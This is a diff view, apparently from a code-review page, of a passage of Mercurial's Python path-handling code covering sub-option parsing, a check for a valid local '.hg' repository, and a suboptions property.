691 setattr(self, attr, None)
685 continue
692 continue
686
693
687 value = func(ui, self, sub_options[suboption])
694 value = func(ui, self, sub_options[suboption])
688 setattr(self, attr, value)
695 setattr(self, attr, value)
689
696
690 def _isvalidlocalpath(self, path):
697 def _isvalidlocalpath(self, path):
691 """Returns True if the given path is a potentially valid repository.
698 """Returns True if the given path is a potentially valid repository.
692 This is its own function so that extensions can change the definition of
699 This is its own function so that extensions can change the definition of
693 'valid' in this case (like when pulling from a git repo into a hg
700 'valid' in this case (like when pulling from a git repo into a hg
694 one)."""
701 one)."""
695 try:
702 try:
696 return os.path.isdir(os.path.join(path, b'.hg'))
703 return os.path.isdir(os.path.join(path, b'.hg'))
697 # Python 2 may return TypeError. Python 3, ValueError.
704 # Python 2 may return TypeError. Python 3, ValueError.
698 except (TypeError, ValueError):
705 except (TypeError, ValueError):
699 return False
706 return False
700
707
701 @property
708 @property
702 def suboptions(self):
709 def suboptions(self):
703 """Return sub-options and their values for this path.
710 """Return sub-options and their values for this path.
704
711
705 This is intended to be used for presentation purposes.
712 This is intended to be used for presentation purposes.
706 """
713 """
707 d = {}
714 d = {}
708 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
715 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
709 value = getattr(self, attr)
716 value = getattr(self, attr)
710 if value is not None:
717 if value is not None:
711 d[subopt] = value
718 d[subopt] = value
712 return d
719 return d
General Comments 0
You need to be logged in to leave comments. Login now